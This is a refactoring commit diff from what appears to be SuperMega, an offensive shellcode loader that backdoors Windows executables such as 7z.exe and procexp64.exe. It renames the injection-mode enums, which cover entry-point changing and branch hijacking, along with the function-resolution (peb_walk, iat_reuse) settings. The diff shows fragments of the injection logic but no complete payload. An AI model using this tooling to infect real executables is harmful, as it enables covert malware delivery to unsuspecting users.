refactor: rename central data structures

app/templates/project.html

@@ -84,31 +84,23 @@
             <!-- row 3 -->
             <div class="col-3">
                 <select class="form-select" name="source_style" aria-label="SOURCESTYLE" onchange="this.form.submit()">
-                    {% for name, value in sourcestyles %}
+                    {% for name, value in function_invoke_styles %}
                     <option value="{{name}}"
                         {% if name in project.settings.source_style.value %} selected {% endif %}
                     >{{value}}</option>
                     {% endfor %}
                 </select>
             
-                <select class="form-select" name="inject_mode" aria-label="INJECTSTYLE" onchange="this.form.submit()">
-                    {% for name, value in injectstyles %}
+                <select class="form-select" name="carrier_invoke_style" aria-label="INJECTSTYLE" onchange="this.form.submit()">
+                    {% for name, value in carrier_invoke_styles %}
                     <option value="{{name}}"
-                        {% if value in project.settings.inject_mode.value %} selected {% endif %}
+                        {% if value in project.settings.carrier_invoke_style.value %} selected {% endif %}
                     >{{value}}</option>
                     {% endfor %}
                 </select>
             
             </div>
             <div class="col-3">
-                <select class="form-select" name="alloc_style" aria-label="ALLOCSTYLE" onchange="this.form.submit()">
-                    {% for name, value in allocstyles %}
-                    <option value="{{name}}"
-                        {% if value in project.settings.alloc_style.value %} selected {% endif %}
-                    >{{value}}</option>
-                    {% endfor %}
-                </select>
-
                 <select class="form-select" name="decoder_style" aria-label="DECODERESTYLE" onchange="this.form.submit()">
                     {% for name, value in decoderstyles %}
                     <option value="{{name}}"
@@ -116,14 +108,6 @@
                     >{{value}}</option>
                     {% endfor %}
                 </select>
-            
-                <select class="form-select" name="exec_style" aria-label="EXECSTYLE" onchange="this.form.submit()">
-                    {% for name, value in execstyles %}
-                    <option value="{{name}}"
-                    {% if value in project.settings.exec_style.value %} selected {% endif %}
-                    >{{value}}</option>
-                    {% endfor %}
-                </select>
             </div>
         </div>
         </form>

app/templates/project_add_get.html

@@ -35,13 +35,7 @@
     </select>
 
     <select class="form-select" name="source_style" aria-label="SOURCESTYLE">
-        {% for name, value in sourcestyles %}
-        <option value="{{name}}">{{value}}</option>
-        {% endfor %}
-    </select>
-
-    <select class="form-select" name="alloc_style" aria-label="ALLOCSTYLE">
-        {% for name, value in allocstyles %}
+        {% for name, value in function_invoke_styles %}
         <option value="{{name}}">{{value}}</option>
         {% endfor %}
     </select>
@@ -52,14 +46,8 @@
         {% endfor %}
     </select>
 
-    <select class="form-select" name="exec_style" aria-label="EXECSTYLE">
-        {% for name, value in execstyles %}
-        <option value="{{name}}">{{value}}</option>
-        {% endfor %}
-    </select>
-
-    <select class="form-select" name="inject_mode" aria-label="INJECTSTYLE">
-        {% for name, value in injectstyles %}
+    <select class="form-select" name="carrier_invoke_style" aria-label="INJECTSTYLE">
+        {% for name, value in carrier_invoke_styles %}
         <option value="{{name}}">{{value}}</option>
         {% endfor %}
     </select>

app/views_project.py

@@ -65,11 +65,9 @@ def project(name):
     for file in os.listdir(PATH_SHELLCODES):
         shellcodes.append(file)
 
-    sourcestyles = [(color.name, color.value) for color in SourceStyle]
-    allocstyles = [(color.name, color.value) for color in AllocStyle]
+    function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle]
     decoderstyles = [(color.name, color.value) for color in DecoderStyle]
-    execstyles = [(color.name, color.value) for color in ExecStyle]
-    injectstyles = [(color.name, color.value) for color in InjectStyle]
+    carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
 
     return render_template('project.html', 
         project_name = name,
@@ -79,11 +77,9 @@ def project(name):
         
         exes=exes,
         shellcodes=shellcodes,
-        sourcestyles=sourcestyles,
-        allocstyles=allocstyles,
+        function_invoke_styles=function_invoke_styles,
         decoderstyles=decoderstyles,
-        execstyles=execstyles,
-        injectstyles=injectstyles,
+        carrier_invoke_styles=carrier_invoke_styles,
 
         log_files=log_files,
         is_64=is_64,
@@ -110,13 +106,10 @@ def add_project():
         settings.inject_exe_out = request.form['exe'].replace(".exe", ".infected.exe")
 
         source_style = request.form['source_style']
-        settings.source_style = SourceStyle[source_style]
+        settings.source_style = FunctionInvokeStyle[source_style]
 
-        inject_mode = request.form['inject_mode']
-        settings.inject_mode = InjectStyle[inject_mode]
-
-        alloc_style = request.form['alloc_style']
-        settings.alloc_style = AllocStyle[alloc_style]
+        carrier_invoke_style = request.form['carrier_invoke_style']
+        settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style]
 
         decoder_style = request.form['decoder_style']
         settings.decoder_style = DecoderStyle[decoder_style]
@@ -147,20 +140,16 @@ def add_project():
         for file in os.listdir(PATH_SHELLCODES):
             shellcodes.append(file)
 
-        sourcestyles = [(color.name, color.value) for color in SourceStyle]
-        allocstyles = [(color.name, color.value) for color in AllocStyle]
+        function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle]
         decoderstyles = [(color.name, color.value) for color in DecoderStyle]
-        execstyles = [(color.name, color.value) for color in ExecStyle]
-        injectstyles = [(color.name, color.value) for color in InjectStyle]
+        carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
 
         return render_template('project_add_get.html', 
             exes=exes,
             shellcodes=shellcodes,
-            sourcestyles=sourcestyles,
-            allocstyles=allocstyles,
+            function_invoke_styles=function_invoke_styles,
             decoderstyles=decoderstyles,
-            execstyles=execstyles,
-            injectstyles=injectstyles,
+            carrier_invoke_styles=carrier_invoke_styles,
         )
 
 

helper.py

@@ -107,14 +107,14 @@ def file_readall_binary(filepath) -> bytes:
     return data
 
 
-def rbrunmode_str(rbrunmode):
-    rbrunmode = str(rbrunmode)
-    if rbrunmode == "1":
+def carrier_invoke_style_str(carrier_invoke_style):
+    carrier_invoke_style = str(carrier_invoke_style)
+    if carrier_invoke_style == "1":
         return "change address of entrypoint"
-    elif rbrunmode == "2":
+    elif carrier_invoke_style == "2":
         return "hijack branching instruction in entrypoint"
     else:
-        return "Invalid: {}".format(rbrunmode)
+        return "Invalid: {}".format(carrier_invoke_style)
 
 
 

model/defs.py

@@ -23,33 +23,25 @@ PATH_WEB_PROJECT = "projects/"
 # Correlated with real template files
 # in data/plugins/
 
-class AllocStyle(Enum):
-    RWX = "rwx_1"
-    #RW_X = "rw_x"
-    #REUSE = "reuse"
 
 class DecoderStyle(Enum):
     PLAIN_1 = "plain_1"
     XOR_1 = "xor_1"
 
-class ExecStyle(Enum):
-    CALL = "direct_1"
-    #JMP = "jump",
-    #FIBER = "fiber",
 
 class DataRefStyle(Enum):
     APPEND = 1
 
 
-class InjectStyle(Enum):
+class CarrierInvokeStyle(Enum):
     ChangeEntryPoint = "change AddressOfEntryPoint"
     BackdoorCallInstr = "hijack branching instruction in entrypoint"
-    
-class SourceStyle(Enum):
+
+
+class FunctionInvokeStyle(Enum):
     peb_walk = "peb_walk"
     iat_reuse = "iat_reuse"
 
-
     
 class PeRelocEntry():
     def __init__(self, rva: int, base_rva: int, type: str):

model/settings.py

@@ -9,15 +9,13 @@ class Settings():
         self.payload_path: FilePath = ""
 
         # Settings
-        self.source_style: SourceStyle = SourceStyle.peb_walk
-        self.alloc_style: AllocStyle = AllocStyle.RWX
-        self.exec_style: ExecStyle = ExecStyle.CALL
+        self.source_style: FunctionInvokeStyle = FunctionInvokeStyle.peb_walk
         self.decoder_style: DecoderStyle = DecoderStyle.XOR_1
         self.dataref_style: DataRefStyle = DataRefStyle.APPEND
         self.short_call_patching: bool = False
 
         # Injectable
-        self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr
+        self.carrier_invoke_style: CarrierInvokeStyle = CarrierInvokeStyle.BackdoorCallInstr
         self.inject_exe_in: FilePath = ""
         self.inject_exe_out: FilePath = ""
 

pe/derbackdoorer.py

@@ -19,9 +19,9 @@ logger = logging.getLogger("DerBackdoorer")
 
 
 class PeBackdoor:
-    def __init__(self, superpe: SuperPe, main_shc: bytes, inject_mode: InjectStyle):
+    def __init__(self, superpe: SuperPe, main_shc: bytes, carrier_invoke_style: CarrierInvokeStyle):
         self.superpe: SuperPe = superpe
-        self.runMode: InjectStyle = inject_mode
+        self.carrier_invoke_style: CarrierInvokeStyle = carrier_invoke_style
         self.shellcodeData: bytes = main_shc
 
         # Working
@@ -72,17 +72,17 @@ Trailing {sect_name} bytes:
 
 
     def setupShellcodeEntryPoint(self):
-        if self.runMode == InjectStyle.ChangeEntryPoint:
+        if self.carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
             rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset)
             self.superpe.set_entrypoint(rva)
 
             logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:X}')
             return True
 
-        elif self.runMode == InjectStyle.BackdoorCallInstr:
+        elif self.carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
             return self.backdoorEntryPoint()
 
-        #elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
+        #elif self.carrier_invoke_style == int(PeBackdoor.Supportedcarrier_invoke_styles.HijackExport):
         #    addr = self.getExportEntryPoint()
         #    if addr == -1:
         #        logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')

phases/compiler.py

@@ -62,7 +62,7 @@ def compile(
     asm_out: FilePath,
     payload_len: int,
     carrier: Carrier,
-    source_style: SourceStyle,
+    source_style: FunctionInvokeStyle,
     exe_host: ExeHost,
     short_call_patching: bool = False,
 ):
@@ -111,7 +111,7 @@ def compile(
             asm_clean_file
         ))
 
-    if source_style == SourceStyle.iat_reuse:
+    if source_style == FunctionInvokeStyle.iat_reuse:
         fixup_iat_reuse(asm_clean_file, carrier)
         observer.add_text_file("carrier_asm_updated", file_readall_text(asm_clean_file))
 

phases/injector.py

@@ -23,8 +23,8 @@ def inject_exe(
     shellcode_in = project.payload.payload_path
     exe_in = settings.inject_exe_in
     exe_out = settings.inject_exe_out
-    inject_mode: InjectStyle = settings.inject_mode
-    source_style: SourceStyle = settings.source_style
+    carrier_invoke_style: CarrierInvokeStyle = settings.carrier_invoke_style
+    source_style: FunctionInvokeStyle = settings.source_style
 
     logger.info("--[ Injecting: {} + {} -> {}".format(
         shellcode_in, exe_in, exe_out
@@ -42,7 +42,7 @@ def inject_exe(
 
     # superpe is a representation of the exe file. We gonna modify it, and save it at the end.
     superpe = SuperPe(exe_in)
-    peinj = PeBackdoor(superpe, main_shc, inject_mode)
+    peinj = PeBackdoor(superpe, main_shc, carrier_invoke_style)
 
     if not peinj.injectShellcode():
         logger.error('Could not inject shellcode into PE file!')
@@ -53,7 +53,7 @@ def inject_exe(
         return False
     
     logger.info("--[ Rewrite placeholders with their data")
-    if source_style == SourceStyle.iat_reuse:
+    if source_style == FunctionInvokeStyle.iat_reuse:
         injected_fix_iat(superpe, project.carrier, project.exe_host)
     
     if True:

phases/templater.py

@@ -24,7 +24,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
         })
 
     # C Template: peb_walk
-    if settings.source_style == SourceStyle.peb_walk:
+    if settings.source_style == FunctionInvokeStyle.peb_walk:
         with open(settings.template_path, 'r', encoding='utf-8') as file:
             template_content = file.read()
             observer.add_text_file("main_c_template", template_content)
@@ -39,7 +39,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
             observer.add_text_file("main_c_rendered", rendered_template)
 
     # C Template: iat_reuse
-    elif settings.source_style == SourceStyle.iat_reuse:
+    elif settings.source_style == FunctionInvokeStyle.iat_reuse:
         with open(PATH_IAT_REUSE + "template.c", 'r', encoding='utf-8') as file:
             template_content = file.read()
             observer.add_text_file("main_c_template", template_content)

supermega.py

@@ -29,11 +29,9 @@ def main():
     parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
     parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
     parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in')
-    parser.add_argument('--sourcestyle', type=str, help='peb_walk or iat_reuse')
-    #parser.add_argument('--alloc', type=str, help='Template: which allocator plugin')
+    parser.add_argument('--function_invoke_style', type=str, help='peb_walk or iat_reuse')
     parser.add_argument('--decoder', type=str, help='Template: which decoder plugin')
-    #parser.add_argument('--exec', type=str, help='Template: which exec plugin')
-    parser.add_argument('--rbrunmode', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)')
+    parser.add_argument('--carrier_invoke', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)')
     parser.add_argument('--start-injected', action='store_true', help='Dev: Start the generated infected executable at the end')
     parser.add_argument('--start-loader-shellcode', action='store_true', help='Dev: Start the loader shellcode (without payload)')
     parser.add_argument('--start-final-shellcode', action='store_true', help='Debug: Start the final shellcode (loader + payload)')
@@ -53,31 +51,25 @@ def main():
     if args.short_call_patching:
         settings.short_call_patching = True
 
-    if args.sourcestyle:
-        if args.sourcestyle == "peb_walk":
-            settings.source_style = SourceStyle.peb_walk
-        elif args.sourcestyle == "iat_reuse":
-            settings.source_style = SourceStyle.iat_reuse
-    #if args.alloc:
-    #    if args.alloc == "rwx_1":
-    #        settings.alloc_style = AllocStyle.RWX
+    if args.function_invoke_style:
+        if args.function_invoke_style == "peb_walk":
+            settings.source_style = FunctionInvokeStyle.peb_walk
+        elif args.function_invoke_style == "iat_reuse":
+            settings.source_style = FunctionInvokeStyle.iat_reuse
     if args.decoder:
         if args.decoder == "plain_1":
             settings.decoder_style = DecoderStyle.PLAIN_1
         elif args.decoder == "xor_1":
             settings.decoder_style = DecoderStyle.XOR_1
-    #if args.exec:
-    #    if args.exec == "direct_1":
-    #        settings.exec_style = ExecStyle.CALL
     if args.inject:
-        if args.rbrunmode == "eop":
-            settings.inject_mode = InjectStyle.ChangeEntryPoint
-        elif args.rbrunmode == "backdoor":
-            settings.inject_mode = InjectStyle.BackdoorCallInstr
+        if args.carrier_invoke == "eop":
+            settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
+        elif args.carrier_invoke == "backdoor":
+            settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr
         else:
             logging.error("Invalid mode, use one of:")
             for i in ["eop", "backdoor"]:
-                logging.error("  {}  {}".format(i, rbrunmode_str(i)))
+                logging.error("  {}  {}".format(i, carrier_invoke_style_str(i)))
             return
 
     if not args.shellcode or not args.inject:
@@ -141,13 +133,10 @@ def start_real(settings: Settings):
     project = Project(settings)
     project.init()
 
-    logger.warning("--I SourceStyle: {}  Inject Mode: {}  ".format(
-        project.settings.source_style.value, project.settings.inject_mode.value))
-    logger.warning("--I   Loader modules:  Alloc: {}  Decoder: {}  Exec: {}".format(
-        project.settings.alloc_style.value, 
-        project.settings.decoder_style.value,
-        project.settings.exec_style.value
-    ))
+    logger.warning("--I FunctionInvokeStyle: {}  Inject Mode: {}  DecoderStyle: {}".format(
+        project.settings.source_style.value, 
+        project.settings.carrier_invoke_style.value,
+        project.settings.decoder_style.value))
 
     # Create: Carrier C source files from template (C->C)
     phases.templater.create_c_from_template(settings, project.payload.len)

tester.py

@@ -19,8 +19,8 @@ def main():
     settings.try_start_final_infected_exe = False
     
     # 7z, peb-walk, change-entrypoint
-    settings.source_style = SourceStyle.peb_walk
-    settings.inject_mode = InjectStyle.ChangeEntryPoint
+    settings.source_style = FunctionInvokeStyle.peb_walk
+    settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
     settings.inject_exe_in = PATH_EXES + "7z.exe"
     settings.inject_exe_out = PATH_EXES + "7z.verify.exe"
     if start(settings) != 0:
@@ -28,8 +28,8 @@ def main():
         return 1
 
     # 7z, peb-walk, hijack
-    settings.source_style = SourceStyle.peb_walk
-    settings.inject_mode = InjectStyle.BackdoorCallInstr
+    settings.source_style = FunctionInvokeStyle.peb_walk
+    settings.carrier_invoke_style = CarrierInvokeStyle.BackdoorCallInstr
     settings.inject_exe_in = PATH_EXES + "7z.exe"
     settings.inject_exe_out = PATH_EXES + "7z.verify.exe"
     if start(settings) != 0:
@@ -37,8 +37,8 @@ def main():
         return 1
 
     # procexp, iat-reuse, change-entrypoint
-    settings.source_style = SourceStyle.iat_reuse
-    settings.inject_mode = InjectStyle.ChangeEntryPoint
+    settings.source_style = FunctionInvokeStyle.iat_reuse
+    settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
     settings.inject_exe_in = PATH_EXES + "procexp64.exe"
     settings.inject_exe_out = PATH_EXES + "procexp64.verify.exe"
     if start(settings) != 0:
@@ -46,8 +46,8 @@ def main():
         return 1
 
     # procexp, iat-reuse, change-entrypoint
-    settings.source_style = SourceStyle.iat_reuse
-    settings.inject_mode = InjectStyle.ChangeEntryPoint
+    settings.source_style = FunctionInvokeStyle.iat_reuse
+    settings.carrier_invoke_style = CarrierInvokeStyle.ChangeEntryPoint
     settings.inject_exe_in = PATH_EXES + "procexp64.exe"
     settings.inject_exe_out = PATH_EXES + "procexp64.verify.exe"
     if start(settings) != 0: